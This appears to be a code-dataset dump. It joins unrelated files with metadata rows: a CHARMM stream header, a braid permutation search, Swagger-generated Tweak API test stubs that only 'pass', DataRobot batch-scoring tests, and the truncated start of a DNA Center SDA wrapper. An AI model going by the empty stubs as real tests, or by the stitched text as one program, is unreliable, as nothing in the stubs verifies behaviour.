!!! stream {toppar_dir_path}/toppar_all36_lipid_inositol.str
!!! stream {toppar_dir_path}/toppar_all36_lipid_lnp.str
!!! stream {toppar_dir_path}/toppar_all36_lipid_lps.str
!!! stream {toppar_dir_path}/toppar_all36_lipid_mycobacterial.str
!!! stream {toppar_dir_path}/toppar_all36_lipid_miscellaneous.str
!!! stream {toppar_dir_path}/toppar_all36_lipid_model.str
!!! stream {toppar_dir_path}/toppar_all36_lipid_prot.str
!!! stream {toppar_dir_path}/toppar_all36_lipid_tag.str
!!! stream {toppar_dir_path}/toppar_all36_lipid_yeast.str
!!! stream {toppar_dir_path}/toppar_all36_lipid_hmmm.str
!!! stream {toppar_dir_path}/toppar_all36_lipid_detergent.str
!!! stream {toppar_dir_path}/toppar_all36_lipid_ether.str
!!!
!!! ! Additional topologies and parameters for carbohydrates
!!! stream {toppar_dir_path}/toppar_all36_carb_glycolipid.str
!!! stream {toppar_dir_path}/toppar_all36_carb_glycopeptide.str
!!! stream {toppar_dir_path}/toppar_all36_carb_imlab.str
!!!
!!! ! Additional topologies and parameters for spin/fluorophore labels
!!! stream {toppar_dir_path}/toppar_all36_label_spin.str
!!! stream {toppar_dir_path}/toppar_all36_label_fluorophore.str
"""
return charmm_inp_header
| 43.884393
| 70
| 0.777792
| 1,185
| 7,592
| 4.525738
| 0.08692
| 0.184598
| 0.266642
| 0.297595
| 0.9394
| 0.935111
| 0.862763
| 0.753869
| 0.267947
| 0.13071
| 0
| 0.036422
| 0.09589
| 7,592
| 173
| 71
| 43.884393
| 0.744901
| 0.319547
| 0
| 0.181818
| 0
| 0
| 0.931
| 0.557566
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018182
| false
| 0
| 0
| 0
| 0.036364
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c429efda4400a9a181e44af7c1b63521d43dab62
| 2,212
|
py
|
Python
|
py_knots/col_perm.py
|
Chinmaya-Kausik/py_knots
|
3c9930ea0e95f6c62da9e13eb5ffcfc0e0737f9f
|
[
"MIT"
] | null | null | null |
py_knots/col_perm.py
|
Chinmaya-Kausik/py_knots
|
3c9930ea0e95f6c62da9e13eb5ffcfc0e0737f9f
|
[
"MIT"
] | null | null | null |
py_knots/col_perm.py
|
Chinmaya-Kausik/py_knots
|
3c9930ea0e95f6c62da9e13eb5ffcfc0e0737f9f
|
[
"MIT"
] | null | null | null |
from braid import *
from sgraph import *
from typing import List
from numpy import random
import copy
# Searches n random permutations for n=tries to find
# the one with the minimal homology basis among them
# for connected spline graphs
def find_min_perm(p: ColBraid, col_signs: List[int],
tries: int) -> (ColBraid, List[int]):
colors = max(p.col_list)+1
col = list(range(colors))
col_list = copy.deepcopy(p.col_list)
graph = p.make_graph(col_signs)
size = len(graph.hom_basis)
good_perm = col
for i in range(tries):
perm = random.permutation(col)
new_col_list = [perm[j] for j in col_list]
new_col_signs = [col_signs[j] for j in perm]
new_p = ColBraid(p.braid, p.strands, new_col_list)
new_graph = new_p.make_graph(new_col_signs)
if(len(new_graph.hom_basis) < size):
size = len(new_graph.hom_basis)
good_perm = perm
new_col_list = [good_perm[i] for i in col_list]
new_col_signs = [col_signs[i] for i in good_perm]
new_p = ColBraid(p.braid, p.strands, new_col_list)
return (new_p, new_col_signs)
# Searches n random permutations for n=tries to find
# the one with the minimal homology basis among them
# for spline graphs with a complete graph on colors
def find_min_perm_complete(p: ColBraid, col_signs: List[int],
tries: int) -> (ColBraid, List[int]):
colors = max(p.col_list)+1
col = list(range(colors))
col_list = copy.deepcopy(p.col_list)
graph = p.make_graph_complete(col_signs)
size = len(graph.hom_basis)
good_perm = col
for i in range(tries):
perm = random.permutation(col)
new_col_list = [perm[j] for j in col_list]
new_col_signs = [col_signs[j] for j in perm]
new_p = ColBraid(p.braid, p.strands, new_col_list)
new_graph = new_p.make_graph_complete(new_col_signs)
if(len(new_graph.hom_basis) < size):
size = len(new_graph.hom_basis)
good_perm = perm
new_col_list = [good_perm[i] for i in col_list]
new_col_signs = [col_signs[i] for i in good_perm]
new_p = ColBraid(p.braid, p.strands, new_col_list)
return (new_p, new_col_signs)
| 29.493333
| 61
| 0.669982
| 364
| 2,212
| 3.826923
| 0.156593
| 0.100503
| 0.05743
| 0.048816
| 0.86145
| 0.86145
| 0.86145
| 0.86145
| 0.86145
| 0.86145
| 0
| 0.001181
| 0.234177
| 2,212
| 74
| 62
| 29.891892
| 0.821133
| 0.127939
| 0
| 0.765957
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042553
| false
| 0
| 0.106383
| 0
| 0.191489
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c467753646f7c06d4ae44189e27332f84930fb21
| 287
|
py
|
Python
|
processing/__init__.py
|
CoderWota/C4.5_with_Adaboost
|
ceab0b0ad266c297c7c4cb4d747b891bf179d255
|
[
"Apache-2.0"
] | null | null | null |
processing/__init__.py
|
CoderWota/C4.5_with_Adaboost
|
ceab0b0ad266c297c7c4cb4d747b891bf179d255
|
[
"Apache-2.0"
] | null | null | null |
processing/__init__.py
|
CoderWota/C4.5_with_Adaboost
|
ceab0b0ad266c297c7c4cb4d747b891bf179d255
|
[
"Apache-2.0"
] | null | null | null |
import sys
sys.path.append(".")
from dctree.processing.coding import encoding
from dctree.processing.coding import decoding_tree
from dctree.processing.coding import encoding_input
from dctree.processing.coding import decoding_predicts
from dctree.processing.coding import encoding_label
| 41
| 54
| 0.864111
| 39
| 287
| 6.25641
| 0.358974
| 0.204918
| 0.409836
| 0.532787
| 0.819672
| 0.819672
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076655
| 287
| 7
| 55
| 41
| 0.920755
| 0
| 0
| 0
| 0
| 0
| 0.003472
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.857143
| 0
| 0.857143
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
67305d7103801f22e1d11074be6a61ae8efb7187
| 16,470
|
py
|
Python
|
test/test_template_api.py
|
tweak-com-public/tweak-api-client-python
|
019f86da11fdb12683d516f8f37db5d717380bcc
|
[
"Apache-2.0"
] | null | null | null |
test/test_template_api.py
|
tweak-com-public/tweak-api-client-python
|
019f86da11fdb12683d516f8f37db5d717380bcc
|
[
"Apache-2.0"
] | null | null | null |
test/test_template_api.py
|
tweak-com-public/tweak-api-client-python
|
019f86da11fdb12683d516f8f37db5d717380bcc
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
tweak-api
Tweak API to integrate with all the Tweak services. You can find out more about Tweak at <a href='https://www.tweak.com'>https://www.tweak.com</a>, #tweak.
OpenAPI spec version: 1.0.8-beta.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import os
import sys
import unittest
import TweakApi
from TweakApi.rest import ApiException
from TweakApi.apis.template_api import TemplateApi
class TestTemplateApi(unittest.TestCase):
""" TemplateApi unit test stubs """
def setUp(self):
self.api = TweakApi.apis.template_api.TemplateApi()
def tearDown(self):
pass
def test_templates_change_stream_get(self):
"""
Test case for templates_change_stream_get
Create a change stream.
"""
pass
def test_templates_change_stream_post(self):
"""
Test case for templates_change_stream_post
Create a change stream.
"""
pass
def test_templates_count_get(self):
"""
Test case for templates_count_get
Count instances of the model matched by where from the data source.
"""
pass
def test_templates_find_one_get(self):
"""
Test case for templates_find_one_get
Find first instance of the model matched by filter from the data source.
"""
pass
def test_templates_get(self):
"""
Test case for templates_get
Find all instances of the model matched by filter from the data source.
"""
pass
def test_templates_id_delete(self):
"""
Test case for templates_id_delete
Delete a model instance by {{id}} from the data source.
"""
pass
def test_templates_id_designs_count_get(self):
"""
Test case for templates_id_designs_count_get
Counts designs of Template.
"""
pass
def test_templates_id_designs_fk_delete(self):
"""
Test case for templates_id_designs_fk_delete
Delete a related item by id for designs.
"""
pass
def test_templates_id_designs_fk_get(self):
"""
Test case for templates_id_designs_fk_get
Find a related item by id for designs.
"""
pass
def test_templates_id_designs_fk_put(self):
"""
Test case for templates_id_designs_fk_put
Update a related item by id for designs.
"""
pass
def test_templates_id_designs_generate_post(self):
"""
Test case for templates_id_designs_generate_post
Generate design from template
"""
pass
def test_templates_id_designs_get(self):
"""
Test case for templates_id_designs_get
Queries designs of Template.
"""
pass
def test_templates_id_designs_post(self):
"""
Test case for templates_id_designs_post
Creates a new instance in designs of this model.
"""
pass
def test_templates_id_exists_get(self):
"""
Test case for templates_id_exists_get
Check whether a model instance exists in the data source.
"""
pass
def test_templates_id_get(self):
"""
Test case for templates_id_get
Find a model instance by {{id}} from the data source.
"""
pass
def test_templates_id_head(self):
"""
Test case for templates_id_head
Check whether a model instance exists in the data source.
"""
pass
def test_templates_id_invitation_tickets_fk_delete(self):
"""
Test case for templates_id_invitation_tickets_fk_delete
Delete InvitationTickets for this Template
"""
pass
def test_templates_id_invitation_tickets_fk_get(self):
"""
Test case for templates_id_invitation_tickets_fk_get
Get InvitationTicket by Id for this Template
"""
pass
def test_templates_id_invitation_tickets_get(self):
"""
Test case for templates_id_invitation_tickets_get
List InvitationTickets for this Template
"""
pass
def test_templates_id_members_count_get(self):
"""
Test case for templates_id_members_count_get
Counts members of Template.
"""
pass
def test_templates_id_members_delete(self):
"""
Test case for templates_id_members_delete
Deletes all members of this model.
"""
pass
def test_templates_id_members_fk_delete(self):
"""
Test case for templates_id_members_fk_delete
Delete a related item by id for members.
"""
pass
def test_templates_id_members_fk_get(self):
"""
Test case for templates_id_members_fk_get
Find a related item by id for members.
"""
pass
def test_templates_id_members_fk_put(self):
"""
Test case for templates_id_members_fk_put
Update a related item by id for members.
"""
pass
def test_templates_id_members_get(self):
"""
Test case for templates_id_members_get
Queries members of Template.
"""
pass
def test_templates_id_members_post(self):
"""
Test case for templates_id_members_post
Creates a new instance in members of this model.
"""
pass
def test_templates_id_members_rel_fk_delete(self):
"""
Test case for templates_id_members_rel_fk_delete
Remove the members relation to an item by id.
"""
pass
def test_templates_id_members_rel_fk_head(self):
"""
Test case for templates_id_members_rel_fk_head
Check the existence of members relation to an item by id.
"""
pass
def test_templates_id_members_rel_fk_put(self):
"""
Test case for templates_id_members_rel_fk_put
Add a related item by id for members.
"""
pass
def test_templates_id_patch(self):
"""
Test case for templates_id_patch
Patch attributes for a model instance and persist it into the data source.
"""
pass
def test_templates_id_permission_delete(self):
"""
Test case for templates_id_permission_delete
Deletes permission of this model.
"""
pass
def test_templates_id_permission_get(self):
"""
Test case for templates_id_permission_get
Fetches hasOne relation permission.
"""
pass
def test_templates_id_permission_post(self):
"""
Test case for templates_id_permission_post
Creates a new instance in permission of this model.
"""
pass
def test_templates_id_permission_put(self):
"""
Test case for templates_id_permission_put
Update permission of this model.
"""
pass
def test_templates_id_portal_folders_count_get(self):
"""
Test case for templates_id_portal_folders_count_get
Counts portalFolders of Template.
"""
pass
def test_templates_id_portal_folders_delete(self):
"""
Test case for templates_id_portal_folders_delete
Deletes all portalFolders of this model.
"""
pass
def test_templates_id_portal_folders_fk_delete(self):
"""
Test case for templates_id_portal_folders_fk_delete
Delete a related item by id for portalFolders.
"""
pass
def test_templates_id_portal_folders_fk_get(self):
"""
Test case for templates_id_portal_folders_fk_get
Find a related item by id for portalFolders.
"""
pass
def test_templates_id_portal_folders_fk_put(self):
"""
Test case for templates_id_portal_folders_fk_put
Update a related item by id for portalFolders.
"""
pass
def test_templates_id_portal_folders_get(self):
"""
Test case for templates_id_portal_folders_get
Queries portalFolders of Template.
"""
pass
def test_templates_id_portal_folders_post(self):
"""
Test case for templates_id_portal_folders_post
Creates a new instance in portalFolders of this model.
"""
pass
def test_templates_id_portal_folders_rel_fk_delete(self):
"""
Test case for templates_id_portal_folders_rel_fk_delete
Remove the portalFolders relation to an item by id.
"""
pass
def test_templates_id_portal_folders_rel_fk_head(self):
"""
Test case for templates_id_portal_folders_rel_fk_head
Check the existence of portalFolders relation to an item by id.
"""
pass
def test_templates_id_portal_folders_rel_fk_put(self):
"""
Test case for templates_id_portal_folders_rel_fk_put
Add a related item by id for portalFolders.
"""
pass
def test_templates_id_portals_count_get(self):
"""
Test case for templates_id_portals_count_get
Counts portals of Template.
"""
pass
def test_templates_id_portals_delete(self):
"""
Test case for templates_id_portals_delete
Deletes all portals of this model.
"""
pass
def test_templates_id_portals_fk_delete(self):
"""
Test case for templates_id_portals_fk_delete
Delete a related item by id for portals.
"""
pass
def test_templates_id_portals_fk_get(self):
"""
Test case for templates_id_portals_fk_get
Find a related item by id for portals.
"""
pass
def test_templates_id_portals_fk_put(self):
"""
Test case for templates_id_portals_fk_put
Update a related item by id for portals.
"""
pass
def test_templates_id_portals_get(self):
"""
Test case for templates_id_portals_get
Queries portals of Template.
"""
pass
def test_templates_id_portals_post(self):
"""
Test case for templates_id_portals_post
Creates a new instance in portals of this model.
"""
pass
def test_templates_id_portals_rel_fk_delete(self):
"""
Test case for templates_id_portals_rel_fk_delete
Remove the portals relation to an item by id.
"""
pass
def test_templates_id_portals_rel_fk_head(self):
"""
Test case for templates_id_portals_rel_fk_head
Check the existence of portals relation to an item by id.
"""
pass
def test_templates_id_portals_rel_fk_put(self):
"""
Test case for templates_id_portals_rel_fk_put
Add a related item by id for portals.
"""
pass
def test_templates_id_put(self):
"""
Test case for templates_id_put
Replace attributes for a model instance and persist it into the data source.
"""
pass
def test_templates_id_replace_post(self):
"""
Test case for templates_id_replace_post
Replace attributes for a model instance and persist it into the data source.
"""
pass
def test_templates_id_tags_count_get(self):
"""
Test case for templates_id_tags_count_get
Counts tags of Template.
"""
pass
def test_templates_id_tags_delete(self):
"""
Test case for templates_id_tags_delete
Deletes all tags of this model.
"""
pass
def test_templates_id_tags_fk_delete(self):
"""
Test case for templates_id_tags_fk_delete
Delete a related item by id for tags.
"""
pass
def test_templates_id_tags_fk_get(self):
"""
Test case for templates_id_tags_fk_get
Find a related item by id for tags.
"""
pass
def test_templates_id_tags_fk_put(self):
"""
Test case for templates_id_tags_fk_put
Update a related item by id for tags.
"""
pass
def test_templates_id_tags_get(self):
"""
Test case for templates_id_tags_get
Queries tags of Template.
"""
pass
def test_templates_id_tags_post(self):
"""
Test case for templates_id_tags_post
Creates a new instance in tags of this model.
"""
pass
def test_templates_id_tags_rel_fk_delete(self):
"""
Test case for templates_id_tags_rel_fk_delete
Remove the tags relation to an item by id.
"""
pass
def test_templates_id_tags_rel_fk_head(self):
"""
Test case for templates_id_tags_rel_fk_head
Check the existence of tags relation to an item by id.
"""
pass
def test_templates_id_tags_rel_fk_put(self):
"""
Test case for templates_id_tags_rel_fk_put
Add a related item by id for tags.
"""
pass
def test_templates_id_team_folder_get(self):
"""
Test case for templates_id_team_folder_get
Fetches belongsTo relation teamFolder.
"""
pass
def test_templates_id_team_get(self):
"""
Test case for templates_id_team_get
Fetches belongsTo relation team.
"""
pass
def test_templates_id_template_members_count_get(self):
"""
Test case for templates_id_template_members_count_get
Counts templateMembers of Template.
"""
pass
def test_templates_id_template_members_delete(self):
"""
Test case for templates_id_template_members_delete
Deletes all templateMembers of this model.
"""
pass
def test_templates_id_template_members_fk_delete(self):
"""
Test case for templates_id_template_members_fk_delete
Delete a related item by id for templateMembers.
"""
pass
def test_templates_id_template_members_fk_get(self):
"""
Test case for templates_id_template_members_fk_get
Find a related item by id for templateMembers.
"""
pass
def test_templates_id_template_members_fk_put(self):
"""
Test case for templates_id_template_members_fk_put
Update a related item by id for templateMembers.
"""
pass
def test_templates_id_template_members_get(self):
"""
Test case for templates_id_template_members_get
Queries templateMembers of Template.
"""
pass
def test_templates_id_template_members_post(self):
"""
Test case for templates_id_template_members_post
Creates a new instance in templateMembers of this model.
"""
pass
def test_templates_id_uploader_get(self):
"""
Test case for templates_id_uploader_get
Fetches belongsTo relation uploader.
"""
pass
def test_templates_id_url_review_get(self):
"""
Test case for templates_id_url_review_get
Get URL to review a template
"""
pass
def test_templates_id_workflow_get(self):
"""
Test case for templates_id_workflow_get
Fetches belongsTo relation workflow.
"""
pass
def test_templates_post(self):
"""
Test case for templates_post
Create a new instance of the model and persist it into the data source.
"""
pass
if __name__ == '__main__':
unittest.main()
| 24.220588
| 165
| 0.629508
| 2,094
| 16,470
| 4.619866
| 0.086915
| 0.166012
| 0.089828
| 0.163324
| 0.836882
| 0.81962
| 0.769589
| 0.684102
| 0.5767
| 0.379161
| 0
| 0.000799
| 0.315968
| 16,470
| 679
| 166
| 24.256259
| 0.857891
| 0.474924
| 0
| 0.465116
| 0
| 0
| 0.001305
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.47093
| false
| 0.465116
| 0.040698
| 0
| 0.517442
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
67408d48f4e9c6241af5291b85d36206cad0834d
| 11,420
|
py
|
Python
|
tests/test_csv_formats.py
|
satvidh/batch-scoring
|
13da21e813da3e757526b9c51f7dd1fe2b224603
|
[
"BSD-3-Clause"
] | 30
|
2016-03-03T10:29:15.000Z
|
2020-06-03T21:43:11.000Z
|
tests/test_csv_formats.py
|
satvidh/batch-scoring
|
13da21e813da3e757526b9c51f7dd1fe2b224603
|
[
"BSD-3-Clause"
] | 164
|
2016-03-03T12:31:22.000Z
|
2020-09-08T13:18:39.000Z
|
tests/test_csv_formats.py
|
satvidh/batch-scoring
|
13da21e813da3e757526b9c51f7dd1fe2b224603
|
[
"BSD-3-Clause"
] | 18
|
2016-05-12T13:50:05.000Z
|
2021-06-30T19:42:09.000Z
|
import csv
import tempfile
import pytest
from datarobot_batch_scoring.batch_scoring import run_batch_predictions
from utils import PickableMock
from datarobot_batch_scoring.reader import DETECT_SAMPLE_SIZE_SLOW
def test_gzipped_csv(live_server, ui):
base_url = '{webhost}/predApi/v1.0/'.format(webhost=live_server.url())
ret = run_batch_predictions(
base_url=base_url,
base_headers={},
user='username',
pwd='password',
api_token=None,
create_api_token=False,
pid='56dd9570018e213242dfa93c',
lid='56dd9570018e213242dfa93d',
import_id=None,
n_retry=3,
concurrent=1,
resume=False,
n_samples=10,
out_file='out.csv',
keep_cols=None,
delimiter=None,
dataset='tests/fixtures/temperatura_predict.csv.gz',
pred_name=None,
timeout=None,
ui=ui,
auto_sample=False,
fast_mode=False,
dry_run=False,
encoding='',
skip_dialect=False,
max_batch_size=1000
)
assert ret is None
def test_explicit_delimiter(live_server):
ui = PickableMock()
base_url = '{webhost}/predApi/v1.0/'.format(webhost=live_server.url())
ret = run_batch_predictions(
base_url=base_url,
base_headers={},
user='username',
pwd='password',
api_token=None,
create_api_token=False,
pid='56dd9570018e213242dfa93c',
lid='56dd9570018e213242dfa93d',
import_id=None,
n_retry=3,
concurrent=1,
resume=False,
n_samples=10,
out_file='out.csv',
keep_cols=None,
delimiter=',',
dataset='tests/fixtures/temperatura_predict.csv',
pred_name=None,
timeout=None,
ui=ui,
auto_sample=False,
fast_mode=False,
dry_run=False,
encoding='',
skip_dialect=False
)
assert ret is None
def test_explicit_delimiter_gzip(live_server):
ui = PickableMock()
base_url = '{webhost}/predApi/v1.0/'.format(webhost=live_server.url())
ret = run_batch_predictions(
base_url=base_url,
base_headers={},
user='username',
pwd='password',
api_token=None,
create_api_token=False,
pid='56dd9570018e213242dfa93c',
lid='56dd9570018e213242dfa93d',
import_id=None,
n_retry=3,
concurrent=1,
resume=False,
n_samples=10,
out_file='out.csv',
keep_cols=None,
delimiter=',',
dataset='tests/fixtures/temperatura_predict.csv.gz',
pred_name=None,
timeout=None,
ui=ui,
auto_sample=False,
fast_mode=False,
dry_run=False,
encoding='',
skip_dialect=False
)
assert ret is None
def test_tab_delimiter(live_server):
ui = PickableMock()
base_url = '{webhost}/predApi/v1.0/'.format(webhost=live_server.url())
ret = run_batch_predictions(
base_url=base_url,
base_headers={},
user='username',
pwd='password',
api_token=None,
create_api_token=False,
pid='56dd9570018e213242dfa93c',
lid='56dd9570018e213242dfa93d',
import_id=None,
n_retry=3,
concurrent=1,
resume=False,
n_samples=10,
out_file='out.csv',
keep_cols=None,
delimiter='\t',
dataset='tests/fixtures/temperatura_predict_tab.csv',
pred_name=None,
timeout=None,
ui=ui,
auto_sample=False,
fast_mode=False,
dry_run=False,
encoding='',
skip_dialect=False
)
assert ret is None
def test_empty_file(live_server):
ui = PickableMock()
base_url = '{webhost}/predApi/v1.0/'.format(webhost=live_server.url())
with pytest.raises(csv.Error) as ctx:
run_batch_predictions(
base_url=base_url,
base_headers={},
user='username',
pwd='password',
api_token=None,
create_api_token=False,
pid='56dd9570018e213242dfa93c',
lid='56dd9570018e213242dfa93d',
import_id=None,
n_retry=3,
concurrent=1,
resume=False,
n_samples=10,
out_file='out.csv',
keep_cols=None,
delimiter=',',
dataset='tests/fixtures/empty.csv',
pred_name=None,
timeout=None,
ui=ui,
auto_sample=False,
fast_mode=False,
dry_run=False,
encoding='',
skip_dialect=False
)
assert "The csv module failed to detect the CSV dialect." in str(ctx.value)
def test_no_delimiter(live_server):
ui = PickableMock()
base_url = '{webhost}/predApi/v1.0/'.format(webhost=live_server.url())
with pytest.raises(csv.Error) as ctx:
run_batch_predictions(
base_url=base_url,
base_headers={},
user='username',
pwd='password',
api_token=None,
create_api_token=False,
pid='56dd9570018e213242dfa93c',
lid='56dd9570018e213242dfa93d',
import_id=None,
n_retry=3,
concurrent=1,
resume=False,
n_samples=10,
out_file='out.csv',
keep_cols=None,
delimiter=';',
dataset='tests/fixtures/temperatura_predict.csv',
pred_name=None,
timeout=None,
ui=ui,
auto_sample=False,
fast_mode=False,
dry_run=False,
encoding='',
skip_dialect=False
)
assert str(ctx.value) == ("Could not determine delimiter")
def test_bad_newline(live_server):
ui = PickableMock()
base_url = '{webhost}/predApi/v1.0/'.format(webhost=live_server.url())
run_batch_predictions(
base_url=base_url,
base_headers={},
user='username',
pwd='password',
api_token=None,
create_api_token=False,
pid='56dd9570018e213242dfa93c',
lid='56dd9570018e213242dfa93d',
import_id=None,
n_retry=3,
concurrent=1,
resume=False,
n_samples=10,
out_file='out.csv',
keep_cols=None,
delimiter=',',
dataset='tests/fixtures/diabetes_bad_newline.csv',
pred_name=None,
timeout=None,
ui=ui,
auto_sample=False,
fast_mode=False,
dry_run=False,
encoding='',
skip_dialect=False
)
lines = len(open('out.csv', 'rb').readlines())
assert lines == 5
ui.warning.assert_any_call('Detected empty rows in the CSV file. '
'These rows will be discarded.')
def test_header_only(live_server):
ui = PickableMock()
base_url = '{webhost}/predApi/v1.0/'.format(webhost=live_server.url())
with pytest.raises(ValueError) as ctx:
run_batch_predictions(
base_url=base_url,
base_headers={},
user='username',
pwd='password',
api_token=None,
create_api_token=False,
pid='56dd9570018e213242dfa93c',
lid='56dd9570018e213242dfa93d',
import_id=None,
n_retry=3,
concurrent=1,
resume=False,
n_samples=10,
out_file='out.csv',
keep_cols=None,
delimiter=',',
dataset='tests/fixtures/header_only.csv',
pred_name=None,
timeout=None,
ui=ui,
auto_sample=False,
fast_mode=False,
dry_run=False,
encoding='',
skip_dialect=False
)
assert str(ctx.value) == ("Input file 'tests/fixtures/header_only.csv' "
"is empty.")
def test_quotechar_in_keep_cols(live_server):
base_url = '{webhost}/predApi/v1.0/'.format(webhost=live_server.url())
ui = PickableMock()
with tempfile.NamedTemporaryFile(prefix='test_',
suffix='.csv',
delete=False) as fd:
head = open("tests/fixtures/quotes_input_head.csv",
"rb").read()
body_1 = open("tests/fixtures/quotes_input_first_part.csv",
"rb").read()
body_2 = open("tests/fixtures/quotes_input_bad_part.csv",
"rb").read()
fd.file.write(head)
size = 0
while size < DETECT_SAMPLE_SIZE_SLOW:
fd.file.write(body_1)
size += len(body_1)
fd.file.write(body_2)
fd.close()
ret = run_batch_predictions(
base_url=base_url,
base_headers={},
user='username',
pwd='password',
api_token=None,
create_api_token=False,
pid='56dd9570018e213242dfa93c',
lid='56dd9570018e213242dfa93d',
import_id=None,
n_retry=3,
concurrent=1,
resume=False,
n_samples=10,
out_file='out.csv',
keep_cols=["b", "c"],
delimiter=None,
dataset=fd.name,
pred_name=None,
timeout=None,
ui=ui,
auto_sample=True,
fast_mode=False,
dry_run=False,
encoding='',
skip_dialect=False
)
assert ret is None
last_line = open("out.csv", "rb").readlines()[-1]
expected_last_line = b'1044,2,"eeeeeeee ""eeeeee"" eeeeeeeeeeee'
assert last_line[:len(expected_last_line)] == expected_last_line
def test_quoted_newline_in_keep_cols_in_fast_mode_fails(live_server):
base_url = '{webhost}/predApi/v1.0/'.format(webhost=live_server.url())
ui = PickableMock()
with tempfile.NamedTemporaryFile(prefix='test_',
suffix='.csv',
delete=False) as fd:
head = open("tests/fixtures/quotes_input_head.csv",
"rb").read()
body_1 = open("tests/fixtures/quotes_input_first_part.csv",
"rb").read()
body_2 = open("tests/fixtures/quotes_input_bad_part_with_newline.csv",
"rb").read()
fd.file.write(head)
size = 0
while size < DETECT_SAMPLE_SIZE_SLOW:
fd.file.write(body_1)
size += len(body_1)
fd.file.write(body_2)
fd.close()
ret = run_batch_predictions(
base_url=base_url,
base_headers={},
user='username',
pwd='password',
api_token=None,
create_api_token=False,
pid='56dd9570018e213242dfa93c',
lid='56dd9570018e213242dfa93d',
import_id=None,
n_retry=3,
concurrent=1,
resume=False,
n_samples=10,
out_file='out.csv',
keep_cols=["b", "c"],
delimiter=None,
dataset=fd.name,
pred_name=None,
timeout=None,
ui=ui,
auto_sample=True,
fast_mode=True,
dry_run=False,
encoding='',
skip_dialect=False
)
assert ret is 1
| 29.282051
| 79
| 0.551839
| 1,233
| 11,420
| 4.861314
| 0.121655
| 0.035035
| 0.036703
| 0.035035
| 0.881882
| 0.862529
| 0.862529
| 0.862529
| 0.854688
| 0.854688
| 0
| 0.056316
| 0.340718
| 11,420
| 389
| 80
| 29.357326
| 0.739806
| 0
| 0
| 0.860335
| 0
| 0
| 0.155692
| 0.112434
| 0
| 0
| 0
| 0
| 0.03352
| 1
| 0.027933
| false
| 0.027933
| 0.044693
| 0
| 0.072626
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6779ebaa1c94be3e27e50cd2e3b1780901867b2a
| 109,740
|
py
|
Python
|
dnacentersdk/api/v2_2_2_3/sda.py
|
oboehmer/dnacentersdk
|
25c4e99900640deee91a56aa886874d9cb0ca960
|
[
"MIT"
] | 32
|
2019-09-05T05:16:56.000Z
|
2022-03-22T09:50:38.000Z
|
dnacentersdk/api/v2_2_2_3/sda.py
|
oboehmer/dnacentersdk
|
25c4e99900640deee91a56aa886874d9cb0ca960
|
[
"MIT"
] | 35
|
2019-09-07T18:58:54.000Z
|
2022-03-24T19:29:36.000Z
|
dnacentersdk/api/v2_2_2_3/sda.py
|
oboehmer/dnacentersdk
|
25c4e99900640deee91a56aa886874d9cb0ca960
|
[
"MIT"
] | 18
|
2019-09-09T11:07:21.000Z
|
2022-03-25T08:49:59.000Z
|
# -*- coding: utf-8 -*-
"""Cisco DNA Center SDA API wrapper.
Copyright (c) 2019-2021 Cisco Systems.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals,
)
from builtins import *
from past.builtins import basestring
from ...restsession import RestSession
from ...utils import (
check_type,
